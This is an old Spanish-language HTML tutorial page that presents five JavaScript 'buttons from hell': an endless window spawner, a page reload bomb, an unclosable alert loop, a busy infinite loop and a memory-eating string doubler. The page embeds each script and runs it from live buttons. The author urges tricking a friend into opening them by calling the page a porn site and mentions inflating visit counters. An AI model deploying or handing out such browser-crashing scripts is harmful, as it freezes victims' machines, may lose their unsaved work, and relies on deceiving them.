<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
	<TITLE></TITLE>
	<META NAME="GENERATOR" CONTENT="StarOffice/5.1 (Linux)">
	<META NAME="AUTHOR" CONTENT="Miguel Angel Nieto Salazar">
	<META NAME="CREATED" CONTENT="20000326;18182059">
	<META NAME="CHANGEDBY" CONTENT="Miguel Angel Nieto Salazar">
	<META NAME="CHANGED" CONTENT="20000331;19195700">
	<!-- START OF SCRIPT -->
	<!-- For more scripts visit http://www.netpedia.com -->
	<SCRIPT LANGUAGE="JavaScript">
<!-- Begin
function AnnoyingButton()
{
   while (true)
       window.alert("HAHAHA...tu no puedes cerrar esta ventana si no reseteas....HAHAHA!") }

function WindowBomb()
{
    var iCounter = 0    
    while (true)
      {
        window.open("http://www.NETural.com/~ccamel","CRASHING" + iCounter,"width=1,height=1,resizable=no")
        iCounter++
      }
}
function ReloadBomb()
{
   history.go(0)                         
   window.setTimeout('ReloadBomb()',1)   
                                         
}

function WhileLoopLock()
{
   while (true){}
}
var szEatMemory = "GOBBLEGOBBLE"  
function EatMemoryInTime()
{
    szEatMemory = szEatMemory + szEatMemory                    
    window.status = "String Length is: " + szEatMemory.length  
    window.setTimeout('EatMemoryInTime()',1);                  
}
// End -->

</SCRIPT>
</HEAD>
<BODY BGCOLOR="#000000">
<P ALIGN=CENTER><IMG SRC="hell.jpg" NAME="Imagen1" ALIGN=BOTTOM WIDTH=300 HEIGHT=75 BORDER=0></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2>En
este articulo expondr&eacute; diferentes trozos de c&oacute;digo en
lenguaje JavaScript, llamados &#147;Los Cinco botones del infierno&#148;
(en realidad eran 6, pero el sexto no lo he podido hacer funcionar)
Gracias a estos peque&ntilde;os c&oacute;digos de javascript podr&aacute;s
paralizar al navegador, dejar sin memoria el ordenador logrando as&iacute;
un reset casi obligado :), y un par de cosillas mas. Antes de
comenzar tengo que explicar que estos scripts no son peligrosos, y
como ya he dicho, el efecto mas da&ntilde;ino que puede tener es el
cuelgue completo del sistema, pero poco mas, el hardware ni el
software se vera afectado de ninguna forma, as&iacute; que no nos
pongamos nerviosos.</FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2>Tambi&eacute;n
tengo que decir, que si quieres divertirte con estos scrips, mejor
que se los pases a un amigo diciendo que es una web porno o algo as&iacute;,
porque como los cuelgues en la red en forma de pagina web, y los
visitantes de la misma comiencen a pulsar el reset como posesos...
seguramente alguno se cabreara, y ser&aacute; peor para ti. Despu&eacute;s
de estos avisos, a los que seguramente nadie har&aacute; ni caso,
comenzamos con el articulo.</FONT></FONT></FONT></P>
<P><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2>Una
ultima cosa, todo lo que dentro del c&oacute;digo lleva // son
comentarios m&iacute;os, no forman parte del c&oacute;digo.</FONT></FONT></FONT></P>
<HR>
<P><BR><BR>
</P>
<P><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><B>1er
bot&oacute;n del infierno:</B></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2><B>Nombre</B>:
Window Spawner<BR><B>Acci&oacute;n</B>: Abrir ventanas sin parar, con
el problema que eso acarrea.<BR><B>C&oacute;digo fuente:</B></FONT></FONT></FONT></P>
<P><FONT COLOR="#000000"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><SPAN STYLE="background: transparent"><SPAN STYLE="font-weight: medium"><I><FONT SIZE=2><FONT COLOR="#ffffff">//
Abrir ventanas sin parar</FONT></FONT></I></SPAN></SPAN><B><BR><FONT COLOR="#ff0000">function</FONT>
<FONT COLOR="#ffffff">WindowBomb</FONT><FONT COLOR="#808000">()</FONT><BR><FONT COLOR="#808000">{</FONT><BR><FONT COLOR="#ff0000">var</FONT>
<FONT COLOR="#ffffff">iCounter</FONT> <FONT COLOR="#808000">=</FONT>
<FONT COLOR="#ff00f0">0</FONT> <SPAN STYLE="background: transparent"><FONT COLOR="#ffffff">//
contador</FONT></SPAN><BR><FONT COLOR="#ff0000">while</FONT>
<FONT COLOR="#808000">(</FONT><FONT COLOR="#ff0000">true</FONT><FONT COLOR="#808000">)</FONT><BR><FONT COLOR="#808000">{</FONT><BR><FONT COLOR="#ffffff">window.open</FONT><FONT COLOR="#808000">(</FONT><FONT COLOR="#0099ff">&quot;http://www.NETural.com/~ccamel&quot;,&quot;CRASHING&quot;</FONT>
<FONT COLOR="#808000">+</FONT>
<FONT COLOR="#ffffff">iCounter</FONT><FONT COLOR="#808000">,</FONT><FONT COLOR="#0000f0">&quot;</FONT><FONT COLOR="#0099ff">width=1,height=1,resizable=no&quot;</FONT><FONT COLOR="#808000">)</FONT>
</B></FONT></FONT></FONT>
</P>
<P><FONT COLOR="#000000"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><SPAN STYLE="background: transparent"><SPAN STYLE="font-weight: medium"><FONT SIZE=2><FONT COLOR="#ffffff">//
La funci&oacute;n para abrir ventanas como un loco</FONT></FONT></SPAN></SPAN><B><BR><FONT COLOR="#ffffff">iCounter</FONT><FONT COLOR="#808000">++</FONT><BR><FONT COLOR="#808000">}</FONT><BR><FONT COLOR="#808000">}</FONT></B></FONT></FONT></FONT></P>
<P><SPAN STYLE="background: transparent"><SPAN STYLE="font-weight: medium"><FONT SIZE=2><FONT FACE="Arial, sans-serif"><FONT COLOR="#ffffff">Como
pod&eacute;is ver, lo que este script hace es abrir ventanas sin
parar, de un tama&ntilde;o de 1x1 pixels. En la ventana se carga la
web </FONT></FONT></FONT></SPAN></SPAN><A HREF="http://www.NETural.com/~ccamel"><SPAN STYLE="background: transparent"><SPAN STYLE="font-weight: medium"><FONT SIZE=2><FONT FACE="Arial, sans-serif"><FONT COLOR="#ffffff">http://www.NETural.com/~ccamel</FONT></FONT></FONT></SPAN></SPAN></A><SPAN STYLE="background: transparent"><SPAN STYLE="font-weight: medium"><FONT SIZE=2><FONT FACE="Arial, sans-serif"><FONT COLOR="#ffffff">.
Como pod&eacute;is ver, tambi&eacute;n es una forma poco legal, de
conseguir un mont&oacute;n de visitas en tu web. Podeis ver su
funcionamiento pinchando en el bot&oacute;n que ten&eacute;is a
continuaci&oacute;n: </FONT></FONT></FONT></SPAN></SPAN>
<P><INPUT TYPE="button" value="Exploding Windows"
Name="btnExplodeWindows" onClick="WindowBomb()"><P><br><BR><BR>
</P>
<HR SIZE=1>
<P><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><U><B><SPAN STYLE="background: transparent">2&ordm;
Bot&oacute;n del infierno.</SPAN></B></U></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2><SPAN STYLE="background: transparent"><B>Nombre</B>:
Bomba de recarga<BR><B>Acci&oacute;n</B>: Recarga la web cada
milisegundo<BR><B>C&oacute;digo fuente:</B></SPAN></FONT></FONT></FONT></P>
<P><FONT COLOR="#808000"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><SPAN STYLE="background: transparent"><SPAN STYLE="font-weight: medium"><I><FONT SIZE=2><FONT COLOR="#ffffff">//
No es tan interesante como otras bombas, pero te obliga<BR>// a estar
en la misma pagina. El usuario no puede cambiar de web,<BR>// o hacer
click en el bot&oacute;n stop para detener la carga.</FONT></FONT></I></SPAN></SPAN><B><FONT COLOR="#000000"><BR></FONT><FONT COLOR="#ff0000">function</FONT><FONT COLOR="#000000">
</FONT><FONT COLOR="#ffffff">ReloadBomb</FONT>()<FONT COLOR="#000000"><BR></FONT>{<FONT COLOR="#000000"><BR></FONT><FONT COLOR="#ffffff">history.go</FONT>(<FONT COLOR="#ff00f0">0</FONT>)<FONT COLOR="#000000">
</FONT></B><FONT COLOR="#000000"><SPAN STYLE="background: transparent"><SPAN STYLE="text-decoration: none"><SPAN STYLE="font-weight: medium"><I><FONT SIZE=2><FONT COLOR="#ffffff">//
Recarga la pagina</FONT></FONT></I></SPAN></SPAN></SPAN><B><BR></B></FONT><B><FONT COLOR="#ffffff">window.setTimeout</FONT>(<FONT COLOR="#000000">'</FONT><FONT COLOR="#ffffff">ReloadBomb</FONT>()<FONT COLOR="#000000">'</FONT>,<FONT COLOR="#ff00f0">1</FONT>)</B><FONT COLOR="#000000"><SPAN STYLE="font-weight: medium">
<SPAN STYLE="background: transparent"><I><FONT SIZE=2><FONT COLOR="#ffffff">//
Le indica al netscape que realice la acci&oacute;n<BR>// cada
milisegundo :)</FONT></FONT></I></SPAN></SPAN><B><BR></B></FONT><B>}</B></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2>Este
script es bastante molesto, y al igual que la anterior tambi&eacute;n
te puede servir para subir el contador de visitas, pero creo que en
un milisegundo al contador no le dar tiempo de contabilizar todas las
visitas :) Si quereis verlo en funcionamiento, pinchar en el
siguiente bot&oacute;n:</FONT></FONT></FONT></P>
<P><INPUT TYPE="button" value="Reload Bomb" Name="btnReload"
onClick="ReloadBomb()"><P><br><BR><BR>
</P>
<HR SIZE=1>
<P><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><U><B>3er
Bot&oacute;n del infierno.</B></U></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2><B>Nombre</B>:
Advertencias sin fin<BR><B>Acci&oacute;n</B>: Abre una ventana de
advertencia, en la que pulsando OK se quitar&iacute;a de nuestra
vista, ahora gracias a este script el personaje que pulse en el bot&oacute;n
se pasara toda su vida pulsando en OK :)<BR><B>C&oacute;digo fuente:</B></FONT></FONT></FONT></P>
<P><FONT COLOR="#808000"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><B><FONT COLOR="#ff0000">function</FONT><FONT COLOR="#000000">
</FONT><FONT COLOR="#ffffff">AnnoyingButton</FONT>()<FONT COLOR="#000000"><BR></FONT>{<FONT COLOR="#000000"><BR></FONT><FONT COLOR="#ff0000">while</FONT><FONT COLOR="#000000">
</FONT>(<FONT COLOR="#ff0000">true</FONT>)<FONT COLOR="#000000"><BR></FONT><FONT COLOR="#ffffff">window.alert</FONT>(<FONT COLOR="#0099ff">&quot;HAHAHA...tu
no puedes cerrar esta ventana si no reseteas....HAHAHA!&quot;</FONT>)<FONT COLOR="#000000">
</FONT>}<FONT COLOR="#000000"><BR></FONT></B><SPAN STYLE="background: transparent"><SPAN STYLE="font-weight: medium"><I><FONT SIZE=2><FONT COLOR="#ffffff">//
Abre una ventana una y otra vez, la cual nunca se podr&aacute;
cerrar.</FONT></FONT></I></SPAN></SPAN></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2><SPAN STYLE="background: transparent">Este
script es imposible de paralizar, despu&eacute;s de cerrar una,
siempre aparecer&aacute; otra :) la &uacute;nica forma de quitarsela
de encima es haciendo un reset o tratando de cerrar netscape a lo
bestia, usease, CTRL+ALT+SUPR. Ala, pinchar en el bot&oacute;n y
disfrutar del espect&aacute;culo.</SPAN></FONT></FONT></FONT></P>

<P><INPUT TYPE="button" value="Annoying Button" Name="btnAnnoy"
onClick="AnnoyingButton()"><P><br><P><br><BR><BR>
</P>
<HR>
<P><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><U><B><SPAN STYLE="background: transparent">4&ordm;
Bot&oacute;n del infierno.</SPAN></B></U></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2><SPAN STYLE="background: transparent"><B>Nombre</B>:
Bucle, bucle...<BR><B>Acci&oacute;n</B>: Ejecuta una acci&oacute;n
infinitamente, dejando sin recursos al navegador. Los navegadores mas
actualizados ya avisan que una secuencia de comandos esta dejandolo
frito, as&iacute; que ya es dif&iacute;cil hacerlo funcionar
:)<BR><B>C&oacute;digo fuente:</B></SPAN></FONT></FONT></FONT></P>
<P><FONT COLOR="#000000"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><B><SPAN STYLE="background: transparent"><FONT COLOR="#ff0000">function</FONT>
<FONT COLOR="#ffffff">WhileLoopLock</FONT><FONT COLOR="#808000">()</FONT><BR><FONT COLOR="#808000">{</FONT><BR><FONT COLOR="#ff0000">while</FONT>
<FONT COLOR="#808000">(</FONT><FONT COLOR="#ff0000">true</FONT><FONT COLOR="#808000">){}</FONT><BR><FONT COLOR="#808000">}</FONT></SPAN></B></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2><SPAN STYLE="background: transparent">Como
veis, el c&oacute;digo no pod&iacute;a ser mas sencillo :) Repite la
acci&oacute;n, en while, una y otra vez, as&iacute; hasta el fin de
los tiempos, logrando que el navegador se valla a la mie***. Pulsa en
el siguiente bot&oacute;n, y disfruta.</SPAN></FONT></FONT></FONT></P>
<P><INPUT TYPE="button" value="While Loop Lock" Name="btnWhile"
onClick="WhileLoopLock()"><p><br><BR><BR>
</P>
<HR>
<P><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><U><B><SPAN STYLE="background: transparent">5&ordm;
Bot&oacute;n del infierno</SPAN></B></U></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2><SPAN STYLE="background: transparent"><B>Nombre</B>:
Come-memoria<BR><B>Acci&oacute;n</B>: Pos eso, que come memoria como
un loco.<BR>C<B>&oacute;digo fuente:</B></SPAN></FONT></FONT></FONT></P>
<P><FONT COLOR="#808000"><FONT FACE="Arial, sans-serif"><FONT SIZE=2 STYLE="font-size: 11pt"><SPAN STYLE="background: transparent"><B><FONT COLOR="#ff0000">var</FONT><FONT COLOR="#000000">
<FONT COLOR="#ffffff">szEatMemory</FONT> </FONT>=<FONT COLOR="#000000">
</FONT><FONT COLOR="#0099ff">&quot;GOBBLEGOBBLE&quot;</FONT><FONT COLOR="#000000">
</FONT></B><FONT COLOR="#000000"><SPAN STYLE="font-weight: medium"><I><FONT SIZE=2><FONT COLOR="#ffffff">//
la frase encargada de comer to :)<BR>// Con este script es posible
colgar una maquina con 16 megas de RAM en poco tiempo<BR>// y lo
mejor de todo es que funciona!!!!</FONT></FONT></I></SPAN><B><BR></B></FONT><B><FONT COLOR="#ff0000">function</FONT><FONT COLOR="#ffffff">
EatMemoryInTime</FONT>()<FONT COLOR="#000000"><BR></FONT>{<FONT COLOR="#000000"><BR></FONT><FONT COLOR="#ffffff">szEatMemory
</FONT>=<FONT COLOR="#000000"> </FONT><FONT COLOR="#ffffff">szEatMemory
</FONT>+<FONT COLOR="#000000"> <FONT COLOR="#ffffff">szEatMemory
</FONT><BR></FONT><FONT COLOR="#ffffff">window.status</FONT><FONT COLOR="#000000">
</FONT>=<FONT COLOR="#000000"> </FONT><FONT COLOR="#0099ff">&quot;String
Length is: &quot;</FONT><FONT COLOR="#000000"> </FONT>+<FONT COLOR="#000000">
</FONT><FONT COLOR="#ffffff">szEatMemory.length</FONT></B><FONT COLOR="#ffffff"><SPAN STYLE="font-weight: medium"><I><FONT SIZE=2>
// informa de el tama&ntilde;o</FONT></I></SPAN></FONT><B><FONT COLOR="#000000"><BR></FONT><FONT COLOR="#ffffff">window.setTimeout</FONT>(<FONT COLOR="#ffffff">'EatMemoryInTime</FONT>()<FONT COLOR="#000000">'</FONT>,<FONT COLOR="#ff00f0">1</FONT>)<FONT COLOR="#000000">;
</FONT></B><FONT COLOR="#000000"><SPAN STYLE="font-weight: medium"><I><FONT SIZE=2><FONT COLOR="#ffffff">//
Le dice al navegador que ejecute esta funci&oacute;n</FONT></FONT></I></SPAN><B><BR></B></FONT><B>}</B></SPAN></FONT></FONT></FONT></P>
<P STYLE="font-weight: medium"><FONT COLOR="#ffffff"><FONT FACE="Arial, sans-serif"><FONT SIZE=2><SPAN STYLE="background: transparent">Este
es el mejor, nunca falla, en poco tiempo el sistema dejara de
funcionar, y la &uacute;nica soluci&oacute;n ser&aacute; un reset :)
Pruebalo, veras que divertido:</SPAN></FONT></FONT></FONT></P>
<P><INPUT TYPE="button" value="Eat Memory In Time" Name="btnEatTime"
onClick="EatMemoryInTime()"><p><br><BR><BR>
</P>
<P ALIGN=RIGHT><A HREF="mailto:punisher@linuxfan.com"><IMG SRC="Punish07.gif" NAME="Imagen1" ALIGN=RIGHT WIDTH=384 HEIGHT=224 BORDER=0><BR CLEAR=RIGHT></A><BR><BR>
</P>
</BODY>
</HTML>